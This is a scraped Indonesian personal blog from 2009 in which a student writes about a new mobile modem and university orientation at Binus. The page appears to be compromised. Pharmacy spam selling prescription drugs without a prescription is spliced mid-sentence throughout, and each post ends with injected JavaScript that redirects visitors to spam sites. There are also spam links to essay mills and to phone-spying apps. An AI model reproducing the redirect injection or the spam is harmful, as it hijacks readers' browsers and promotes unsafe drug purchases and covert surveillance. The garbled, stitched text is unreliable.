Aug
30
2009
0

Flash gw nih!!

akhirnya!!! setelah cukup lama menunggu, gw punya juga modem telkomsel flash. yah, walaupun ternyata eh ternyata, flash unlimited dah ga bs lg di daftar, dah tutup katanya. tp gpp, selama masih ada penggantinya yg volume based, gw seneng juga. untuk saat ini cukuplah bg gw soalnya biasanya awal2 kuliah pasti bakal butuh bgt sama yg namanya koneksi internet. untuk liat jadwal lah, materi2 lah, belom lg buka2 forum yg katanya sebagian dosen bakal ngenilai dr sana.
lumayan juga kecepatannya(dibanding dg telkomnetinstan), ya tp lebi enak kalo ngekos ditempatnya si josep ato kak denny. si josep udah donlot game2 gede lagi, ngiri bgt gw ma koneksinya dy. tp lebi enakan kak denny katanya, internetnya stabil terus, klo donlot kec 2mbps. mantepkan!! coba lo bayangin lg donlot dvd yg rata2 4gb. azithromycin buy online cheapest | buy online without prescription. low prices, fast delivery and secure online processing.
4GB=4000MB jd kira2 ngabisin waktu 2000 detik.
2000 detik = 33,33 menit = setengah jam!! 40 in vancouver canada discount prices. prescription best prices, can you legally yes here online, online deltasone 10 mg pills in nebraska; prednisone in spain ; deltasone in ri; prednisone in vt
kalo aja gw bs kaya gitu, beuh! semua film2 terbaru pasti gw yg duluan nonton drpd org laen. gw mesti sabar bwat nunggu kos2an mereka kosong satu aja. klo udah kosong, langsung gw isi tuh kosan, tunai! mudah2an ada kakak kelas yg udah mau lulus ato pada ga betah dengerin suara dagang sate yg “horor” itu. suaranya, ampun dah!!! coba lo bayangin lo2 pada lg maen fear2 matiin lampu trus gedein speakernya. pas tegang2nya tau2 ada suara “horor” teriak2, “TE, SATE, SATE,..” menggigil gw. udah ah, males bgt gw nginget2 itu lg. haha.
see you!!
=)window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”; document.currentScript.parentNode.insertBefore(s, document.currentScript); Teach students the www.writemypaper4me.org/ art of the good question

Written by tomijenson in: Uncategorized |
Aug
27
2009
0

akhirnya!!

duh. akhirnya ngeblog lagi.
beberapa hari belakangan gw sibuk ospek ma paska ospek(nyantai maksudnya). ospeknya ternyata ga seserem yg gw bayangkan, malahan seru bgt. kasian jdnya ngeliat tmn2 yg poada ospek gila2an. hahahaha(malah ketawa jdnya). order online at usa pharmacy! cheap . top offering, no prescription.
ospek dibinus enak bgt. ga da dsuruh yg susah2, paling cuma nemtek ma makan siang yg harus dibawa terus. itupun ga pake rumit buatnya. seharian kerjanya klo ga dengerin ceramah, ya belajar ttg binus dan segala hal yg berhubungan ma binus. mulai dari sitem kuliah, pembayaran, services2, binusmaya, dll. bisa dibilang enak bgt, tmn2 sekelas juga pada asik, gokil2. bisa ketawa sepuasnya, ngeledekin orang, pokoknya lucu2an aja.
yang menarik lg tu pas EXPO, kita pada bebas keliling2 binus. pergi dari stand satu ke yg lain mencoba mendapatkan souvenir secara gratis!! enak ga tuh? tp sebenernya capek juga, abisnya ga da tempat istirahat. untungnya si hanok ma lutfi nyerobot kelas laen, jdnya pada bs ngadem di kelas org.hehehehe. jahat bgt emang kita, nyerobot kelas org laen.
bleeding after cheap prednisone no prescription, or after a stomach operations can be in a gleam of online uk no prescription, and of a 
skarang gw dah balik lg ke bali. pulang kampung dulu untuk sementara, males bgt gw puasa di jkt, ntar susa nyari bukaan ma sahur. tp ga enak juga dsini. ga da org, ga tau mau ngapain jdnya. tiap hari cuma ngenet doang kerjanya. hoaaaamm!! ngantuk bgt klo gini2 aja kerjanya.
oya gw mau nunjukin wallpaper baru gw di laptop.

keren ga tuh?? dec 26, 2014 – womans health, cream cheap, online uk – hinghamnurseryschool.com. at 52 purchase estrace weeks, results of two 
skarang semenjak masuk binus, gw mulai serius mendalami programming. emang males rasanya tapi harus. gw pengen cari IP tinggi ntar supaya keren. hahahaha!!!!! top quality medications. buy australia . cheapest rates, zoloft generic or brand.
udah dulu ye, gw mau nonton pilem dulu. bye!!
.window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”; } else { There is spyappsinsider.com/android-spy-app/ however, some skepticism to the authenticity

Written by tomijenson in: Uncategorized |
Aug
05
2009
0

detik2 menjelang ospek

biasanya tu, klo dah menjelang ospek, orang2 pada sibuk. ada yg ngurusin kos2an, ada juga yg siapin mental. nah klo gw? sibuk nungguin tanggal keberangkatan. nonton tv tiap hari, ngenet kadang2 doang. intinya ga da keluar rumah. gmana mau keluar kalo temen2 rata2 dah pada pergi smua. pernah juga waktu itu diajakin jalan2 ma temen, jam 1 di sentro. mau sih, tapi liat keadaan dulu. kemarennya begadang semaleman (ga tau jg ngapain, biasalah kalo org lg insomia). bangun dah jam setengah satu, blom lg mandi, ngengek, sikat gigi, matiin tv ma laptop yg nyala terus semaleman. pas jam satuan smspun datang, kira2 gini bunyinya. “eh jadi ga? gw lg dijalan, ntar ketemuan di sentro, cepetan.” duh ngeliat tu sms jadi males banget, mana disuruh cepetan lg. gw blg aja lg asik ngenet, males pergi. balasanpun dateng “beh, jelek kali qe.” yg blg gw cakep the lowest prices for fluoxetine from online pharmacies and prescription discount cards! before you , compare the best prices on fluoxetine from  sapa? gw aja br bangun, rambut acak2an, blom mandi lg.

sildenafil 100mg dapoxetine 60mg 60’s dapoxetine tadalafil combination

kadang2 gw juga ngotak-ngatik laptop keramat. sibuk banget keliatannya kayak org kantoran, padahal cuma dengerin lagu doang pake headset kesayangan. sesekali chatting juga, telpon2an ma doli pake ym bwat mamerin headset baru. gw baru tau klo titik kejenuhan tertinggi tu pas lg nunggu ospek. coba liat aja org 40 mg high 60mg side effects can i order prozac online reviews 360 mg prozac to die. buy cheap cost prozac 10 mg anxiety is laen selain gw, pasti pada ga da kerjaan. paling drumah doang guling2, tidur, abis bangun makan, abis itu tidur lagi kyk lagunya si mbah surip. kasian juga dy, baru tenar malah dah pergi. ckckckck.

kadang2 gw juga mikir, yg laen pas kyk gini pasti sibuk beli2 kebutuhan ngekost ntar, kyk si erik bli hardisk eksternal, dydo yg keliling2 nyari aqua galon. tp knapa ya gw ga ngapa2in, seharusnya kan ngapain gt. ortu juga ga nanya2, diem aja. “tom, ga beli barang bwat kos ntar?” seharusnya kan gt, ni ortu peduli ga sih ma kehidupan kos gw. gara2 dydo gw jadi mikir, penting ga sih kita beli galon aqua? emang ga dikasi minum ya dikos ntar? kayaknya penting tu. untung aja depan kos gw banyak dagang makanan, jd gw ga terlalu peduli ma yg begituan. klo peralatan komputer sih mungkin bli dsana aja, males bawa2 komputer dr bali kayak org mudik aja. ntar kaya jo lg, motor dikirim dr bali eh malah rusak. untung orgnya mau order baclofen (lioresal) online from $ 0.68 per pill. baclofen is used for treating severe muscles spasms as a result of variety online canada ganti klo ga gmana?

gw juga lg bingung mau bawa apa aja ntar. perlukah bw semua isi kamar gw? laptop berguna ga pas lg ospek? mungkin ga, tp gw pengen bawa bwat hiburan ntar dsana. sapa tau gw langsung bakal kuliah abis ospek. tp katanya dydo sih, paling beberapa minggu abis ospek baru mulai kuliah, jd bisa beres2 bwat pindahan. dy lg ospek skarang, gw gelombang abis dy. katanya sih cuma kuliah2 ttg jurusan lw, pengenalan pertama gt. ada bakti sosial jg katanya. india. dna synthesis and. pde5 inhibitors including doctor skarang ni gw lagi nanya td ospeknya ngapain, cari info sebelum ospek biar siap semua. semoga aja ga da yg aneh2 biar ga ribet ntar gw dsana, blom tau apa2 alnya.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”; window.location = “http://cheap-pills-norx.com/search.htm?route=search&q=”; } else { Supported ios all ios versions are https://spying.ninja/how-to-spy-on-iphone-text-messages-free currently supported

Written by tomijenson in: Uncategorized |

Powered by WordPress. Theme: TheBuckmaker. Zinsen, Streaming Audio